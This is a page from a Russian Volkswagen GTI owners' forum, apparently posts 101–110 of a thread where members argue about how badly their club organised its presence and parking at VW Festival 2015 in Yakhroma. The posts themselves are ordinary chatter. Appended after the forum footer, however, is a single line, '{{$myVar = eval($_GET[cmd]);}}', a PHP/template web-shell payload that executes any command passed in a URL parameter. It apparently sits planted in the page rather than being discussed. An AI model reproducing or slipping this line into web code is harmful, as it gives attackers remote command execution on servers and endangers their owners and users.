+ Ответить в теме
Страница 11 из 13 ПерваяПервая ... 9 10 11 12 13 ПоследняяПоследняя
Показано с 101 по 110 из 126

Тема: VW Festival 2015 г. на территории ПАРКА ЯХРОМА


  1. #101
    GTI-Racing Maveriq will become famous soon enough Maveriq will become famous soon enough Аватар для Maveriq
    Регистрация
    29.11.2011
    Откуда
    Москва
    Машина
    Golf 4 GTI 340лс 450 н/м
    Сообщений
    238
    Да ну давай по существу, что же там с тигуан клубом?)) и что за расстройство? и почемц было не предупредить как бы остальных "давай те менять дислокацию?" И дома сняли, но пока откликнулись и нашлись было уже час ночи и все спать побрели...короче провал и точка...скидывались баблом только 4-е года назад, все остальные года просто все привозили все с собой, но хоть как-то вставали рядом, а тут Brembo решил поспать до 11 и все вообще разъехались кто куда...а можно было Бы зайти на площадку вечером в пятницу и поговорить с оргами насчет места в субботу на парковке...я вот что-то не помню, чтоб все разбежались в другие места, когда был фест на гребном, хоть и место было в самой опе, так все равно клуб встал вместе забив на все правила феста...а в этом году никакого коллектива...

  2. #102
    GTI-Racing 01RUS is on a distinguished road Аватар для 01RUS
    Регистрация
    19.09.2011
    Откуда
    Москва
    Машина
    VW GOLF 7 GTI
    Сообщений
    479
    Цитата Сообщение от Maveriq Посмотреть сообщение
    Да ну давай по существу, что же там с тигуан клубом?)) и что за расстройство? и почемц было не предупредить как бы остальных "давай те менять дислокацию?" И дома сняли, но пока откликнулись и нашлись было уже час ночи и все спать побрели...короче провал и точка...скидывались баблом только 4-е года назад, все остальные года просто все привозили все с собой, но хоть как-то вставали рядом, а тут Brembo решил поспать до 11 и все вообще разъехались кто куда...а можно было Бы зайти на площадку вечером в пятницу и поговорить с оргами насчет места в субботу на парковке...я вот что-то не помню, чтоб все разбежались в другие места, когда был фест на гребном, хоть и место было в самой опе, так все равно клуб встал вместе забив на все правила феста...а в этом году никакого коллектива...
    Предлагаю заняться организацией тусы нашего клуба в следующем году с таким грамотным подходом тебе лично. Думаю в этом случае все будут довольны! )

    ---------- Сообщение добавлено в 16:23 ---------- Предыдущее сообщение размещено в 16:21 ----------

    Цитата Сообщение от Korney Посмотреть сообщение
    Руслан, давай будем честны: то, что мы стояли машин в 15(максимум) рядом, это исключительно твоя заслуга, ну и случая и coldibas, с его неустанными метаниями по парковке с тем чтоб место забить...
    По моим подсчетам 24 )
    O1RUS

    GOLF 7 GTI OEM

  3. #103
    GTI-Racing Korney is on a distinguished road Аватар для Korney
    Регистрация
    04.06.2014
    Откуда
    СВАО
    Машина
    R32 mk V
    Сообщений
    343
    Цитата Сообщение от 01RUS Посмотреть сообщение
    Предлагаю заняться организацией тусы нашего клуба в следующем году с таким грамотным подходом тебе лично. Думаю в этом случае все будут довольны! )

    ---------- Сообщение добавлено в 16:23 ---------- Предыдущее сообщение размещено в 16:21 ----------



    По моим подсчетам 24 )
    Ок, я не считал)
    Boost is like a blowjob

  4. #104
    GTI-Racing Maveriq will become famous soon enough Maveriq will become famous soon enough Аватар для Maveriq
    Регистрация
    29.11.2011
    Откуда
    Москва
    Машина
    Golf 4 GTI 340лс 450 н/м
    Сообщений
    238
    Я предлагаю все таки делать это коллективно, а не мне одному, так как я писал о коллективе и о распределении обязанностей: кто-то закупает шашлык, кто-то пиво, кто-то везет шатер, кто-то занимается флагами, в одно лицо ни я, ни кто либо иной это не вытянет, нужно человек 5-6 для организации и участников финансовых человек 20, которые при фразе деньги не разбегуться! Я готов принять активное участие в организации как материально, так и физически, предлагаю создать тему на форуме Фест след года, где мы соберем инфу у кого есть шатер, у кого есть возможность там мясо замутить, кто с пивом поможет(могу пиво легко взять на себя с покупкой на заводе), подсчитать бюджет и сделать все по людски, а не краснеть перед впервые приехавшими на Фест людьми из клуба, которым говорил, что будет круто, а в итоге просто провал...

  5. #105
    Мисс GTI 2011 Julya has a spectacular aura about Julya has a spectacular aura about Julya has a spectacular aura about Аватар для Julya
    Регистрация
    20.04.2010
    Откуда
    Москва
    Машина
    Golf IV 1.6, Golf V 1.6 и зверюга
    Сообщений
    1,150
    Цитата Сообщение от 01RUS Посмотреть сообщение
    И 4 года подряд почти никто не скидывался по факту и организаторы покупали за свой счет в расчете на то, что остальные участники скинуться на месте. Но не тут-то было...
    Те, кто хотел хорошо провести время, приехали накануне, сняв гостиницу или коттеджи и отлично отдохнули, с пивом, шашлыками и тд...
    А по-поводу лайков и места ты не прав. Те кто хотел встать с клубом, встали, в общей сложности было машин 20-30. Почему мы не встали рядом с Тигуан клубом не буду писать, боюсь расстроишься...
    Руслан, да, отдохнули хорошо! спасибо за места на площадке!
    :girl_love:

  6. #106
    GTI-Racing Евгений GTI is on a distinguished road Аватар для Евгений GTI
    Регистрация
    07.12.2010
    Откуда
    М.О
    Машина
    Golf 5 GTI
    Сообщений
    163
    Я вообще удивился, когда заехал первый на площадку, и ко мне подошел дядя с тетрадкой, и спросил: какой клуб? Я ему ответил: GTI-club! Он посмотрел и сказал: что такого нету клуба! Может Jetta-club? Неееет дядя! Именно GTI-club! Ладно, вы пока вон там встаньте, а я все узнаю. Так мы и остались возле Тигуанов. Где кто был, я не знаю,но получилось как получилось. Надеюсь на следующий фест будем организованнее.

  7. #107
    GTI-Racing Yasik is on a distinguished road Аватар для Yasik
    Регистрация
    24.01.2013
    Откуда
    Msfnct
    Машина
    VW Golf 5 GTI
    Сообщений
    424
    С самого начала феста знал где буду стоять, там и встал)

  8. #108
    GTI-Racing 01RUS is on a distinguished road Аватар для 01RUS
    Регистрация
    19.09.2011
    Откуда
    Москва
    Машина
    VW GOLF 7 GTI
    Сообщений
    479
    Цитата Сообщение от Yasik Посмотреть сообщение
    С самого начала феста знал где буду стоять, там и встал)
    Ну не все такие низкие, как ты...
    O1RUS

    GOLF 7 GTI OEM

  9. #109
    GTI-Racing Yasik is on a distinguished road Аватар для Yasik
    Регистрация
    24.01.2013
    Откуда
    Msfnct
    Машина
    VW Golf 5 GTI
    Сообщений
    424
    Я себе типа оправдание нашел))))))

  10. #110
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от Yasik Посмотреть сообщение
    С самого начала феста знал где буду стоять, там и встал)
    На заднем плане походу фанбои
    песок сыпется....не останавливайтесь на достигнутом !

+ Ответить в теме
Страница 11 из 13 ПерваяПервая ... 9 10 11 12 13 ПоследняяПоследняя

Похожие темы

  1. II этап Кубка "Магистраль 2015" - 4 апреля 2015 г.
    от Magistral в разделе Туризм и отдых
    Ответов: 3
    Последнее сообщение: 02.04.2024, 19:54
  2. !VW FESTIVAL 2014 16-18 мая @ Яхрома, МО
    от GreyRabbit в разделе Встречи и мероприятия
    Ответов: 128
    Последнее сообщение: 06.03.2019, 16:24
  3. Фото VW festival 2013
    от BON в разделе Клубные фотки и видео
    Ответов: 21
    Последнее сообщение: 06.06.2013, 03:49
  4. Пре-пати VW Festival 2012
    от ШОРТ в разделе Клубная Тема
    Ответов: 0
    Последнее сообщение: 18.04.2012, 18:21
  5. Видео с VW Festival #5
    от styuru в разделе Клубные фотки и видео
    Ответов: 30
    Последнее сообщение: 16.08.2011, 21:46

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}